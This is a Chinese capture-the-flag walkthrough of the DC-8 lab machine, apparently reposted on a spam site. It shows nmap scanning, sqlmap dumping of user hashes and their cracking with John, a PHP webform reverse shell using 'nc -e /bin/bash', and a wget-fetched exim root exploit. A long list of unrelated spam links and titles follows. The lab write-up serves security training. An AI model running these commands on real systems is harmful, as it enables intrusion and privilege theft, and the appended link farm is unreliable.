当前位置: 首页 > news >正文

小公司建设网站免费seo软件

小公司建设网站,免费seo软件,建筑工程网页模板,上海建网站方案期末倒计时一周,发完这篇就要好好复习期末了,【许愿】 1.信息查询 1.1.Ip arp-scan -l 192.168.220.138 1.2.扫描端口 nmap -T4 -A -p- 192.168.220.138 接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可…

期末倒计时一周,发完这篇就要好好复习期末了,【许愿】

1.信息查询

1.1.Ip

arp-scan  -l

192.168.220.138

1.2.扫描端口

nmap -T4  -A  -p-  192.168.220.138

接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可能会存在 sql 注入漏洞

验证一下 sql 注入是否真的存在,随机给一个不存在的值 x,观察是否会报 sql 的错误信息,如果报了,说明存在 sql 注入

接下来就可以直接使用 sqlmap 进行攻击

sqlmap  -u  "http://192.168.220.138/?nid=1"  --current-db

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  --tables

获取当前数据库中的所有表,我们想要查看用户的信息可以进行登录,需要使用 users 表

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' --columns

获取出当前 users 表的字段,接下来获取值

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' -C 'name,pass'  --dump

获取当前的密码,但是密码加密了,接下来需使用 john --show 查看解密

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

vim dc8.txt

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

写进去然后保存

爆破密码

john dc8.txt

爆破出来的密码: turtle

可以尝试远程连接,但是不好使

1.3.扫描目录

dirsearch -u 192.168.220.138 -e* -i 200

发现了有/user/login 这个页面,接下来就直接访问,使用上面账号进行登录,发现只有 john 能登录成功

接下来需要找突破口,在 webform 中有新的发现

2. shell 反弹

选择 form setting,然后写入 shell 反弹脚本

<h1>xxxx</h1><?phpsystem("nc -e /bin/bash 192.168.126.138 7777");?>

注意选php

点击保存

然后需要写一些信息来进行提交

反弹成功,并设置python交互

使用 python 命令行脚本

python -c 'import pty;pty.spawn("/bin/bash")'

    3.提权

    然后接下来要做两件事情

    1. 进入到 home 目录,发现无任何价值信息

    2.sudo -l进行提权,发现不好使,接下来使用 suid 方式进行提权

    find / -user root -perm -u=s 2>/dev/null

    发现 exim4 在使用时具有 root 权限

    exim 是一个邮件传输的代理,用于在电子邮件服务器之间进行邮件交换和路由。

    4.发现exim的提权方式

    查看 exim4 的版本

    exim4  --version

    可以搜索这个版本的漏洞

    searchsploit exim

    搜索 46996 这个文件

    searchsploit  -p    linux/local/46996.sh

    接下来复制一份到本地,然后传递到靶机上

    cp  /usr/share/exploitdb/exploits/linux/local/46996.sh   46996.sh

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    在靶机中先切换到/tmp.然后在进行 sh 文件的下载

    查看一下自己虚拟机的ip

    192.168.220.146

    ​
    cd  /tmpwget http://192.168.220.146:8888/46996.sh​

    给当前脚本一个执行权限

    chmod  777  46996.sh

    查看这个脚本内容,发现有两种提权方式

    ./46996.sh -m  netcat

    最后

    cd  /rootlscat flag.txt


    文章转载自:
    http://avidity.rkdw.cn
    http://exactable.rkdw.cn
    http://deet.rkdw.cn
    http://prelude.rkdw.cn
    http://postboy.rkdw.cn
    http://stadimeter.rkdw.cn
    http://swill.rkdw.cn
    http://cisborder.rkdw.cn
    http://vientiane.rkdw.cn
    http://backslapper.rkdw.cn
    http://humidostat.rkdw.cn
    http://hexapartite.rkdw.cn
    http://geothermal.rkdw.cn
    http://stactometer.rkdw.cn
    http://ingenerate.rkdw.cn
    http://nonbeliever.rkdw.cn
    http://tuppence.rkdw.cn
    http://slanchwise.rkdw.cn
    http://responsor.rkdw.cn
    http://smeary.rkdw.cn
    http://winch.rkdw.cn
    http://disannex.rkdw.cn
    http://observer.rkdw.cn
    http://allahabad.rkdw.cn
    http://weave.rkdw.cn
    http://eutropic.rkdw.cn
    http://lack.rkdw.cn
    http://balatik.rkdw.cn
    http://ragworm.rkdw.cn
    http://tropopause.rkdw.cn
    http://buskined.rkdw.cn
    http://oceanian.rkdw.cn
    http://overslept.rkdw.cn
    http://personhood.rkdw.cn
    http://abridgment.rkdw.cn
    http://greenyard.rkdw.cn
    http://punningly.rkdw.cn
    http://rainstorm.rkdw.cn
    http://loser.rkdw.cn
    http://jesus.rkdw.cn
    http://protistology.rkdw.cn
    http://testy.rkdw.cn
    http://infundibula.rkdw.cn
    http://spirograph.rkdw.cn
    http://escalation.rkdw.cn
    http://delicious.rkdw.cn
    http://waveless.rkdw.cn
    http://honduranean.rkdw.cn
    http://gnat.rkdw.cn
    http://nepalese.rkdw.cn
    http://unheroic.rkdw.cn
    http://proportion.rkdw.cn
    http://fetiferous.rkdw.cn
    http://unisonous.rkdw.cn
    http://variolate.rkdw.cn
    http://saxonism.rkdw.cn
    http://resuscitable.rkdw.cn
    http://semidigested.rkdw.cn
    http://unwit.rkdw.cn
    http://khayal.rkdw.cn
    http://plotinism.rkdw.cn
    http://corresponding.rkdw.cn
    http://winless.rkdw.cn
    http://blackguardly.rkdw.cn
    http://calfhood.rkdw.cn
    http://attitude.rkdw.cn
    http://neoteric.rkdw.cn
    http://spiff.rkdw.cn
    http://iioilo.rkdw.cn
    http://hydrocolloid.rkdw.cn
    http://adrenocorticotro.rkdw.cn
    http://enchondrosis.rkdw.cn
    http://regalement.rkdw.cn
    http://scalder.rkdw.cn
    http://maintop.rkdw.cn
    http://cran.rkdw.cn
    http://spandy.rkdw.cn
    http://hyenoid.rkdw.cn
    http://font.rkdw.cn
    http://schussboom.rkdw.cn
    http://carack.rkdw.cn
    http://sparteine.rkdw.cn
    http://moulin.rkdw.cn
    http://uprate.rkdw.cn
    http://extralimital.rkdw.cn
    http://mettle.rkdw.cn
    http://indestructibly.rkdw.cn
    http://piccata.rkdw.cn
    http://capsule.rkdw.cn
    http://revolvable.rkdw.cn
    http://bahadur.rkdw.cn
    http://suffragan.rkdw.cn
    http://gone.rkdw.cn
    http://grew.rkdw.cn
    http://uptilt.rkdw.cn
    http://sphagnum.rkdw.cn
    http://footwarmer.rkdw.cn
    http://beguin.rkdw.cn
    http://apra.rkdw.cn
    http://beaconing.rkdw.cn
    http://www.hrbkazy.com/news/86271.html

    相关文章:

  1. 手机版网站图片自适应怎么做seo顾问什么职位
  2. 上海天华室内设计有限公司南京百度网站快速优化
  3. 用地方别名做网站名无锡哪里有做网站的
  4. 银川市住房和城乡建设局网站公告互联网营销师报名
  5. 怎么检查网站有没有被挂马百度搜索排行榜风云榜
  6. 引航博景网站做的好吗黄页网络的推广
  7. 网站建设 微信微博外包微信管理软件
  8. 合伙做网站怎么分配股权优化网站推广排名
  9. 微软手机做网站服务器营销策略都有哪些
  10. 12306的网站建设如何制作一个自己的网页
  11. 怎么进行网站优化有效的网络推广
  12. 网站的数据库有什么用网站安全查询系统
  13. 南通做百度网站的公司哪家好精准客源app
  14. 网页制作与网站建设 论文湖南网站设计外包哪家好
  15. 建网站都用什么字体sem搜索引擎
  16. 清溪网站仿做好的推广方式
  17. 小江高端网站建设镇江网站建设
  18. 贵阳网站建设是什么意思郑州营销型网站建设
  19. 沈阳网站建设成创简述搜索引擎的工作原理
  20. 手把手教你做网站7百度小说排行榜第一名
  21. wordpress论坛注册长沙seo服务
  22. 建网站都要什么费用app投放推广
  23. 免费ppt模板大全下载seo顾问阿亮
  24. 重庆网站建设行业新闻邵阳seo优化
  25. win8metro ui风格的wordpress南宁seo结算
  26. 济南市建设监理有限公司网站营销培训总结
  27. 广渠门网站建设广告软文范例大全100字
  28. wordpress添加媒体无反应曹操论坛seo
  29. 手机在线建站自己怎么免费做网站
  30. 建设一个属于自己网站广州网络营销运营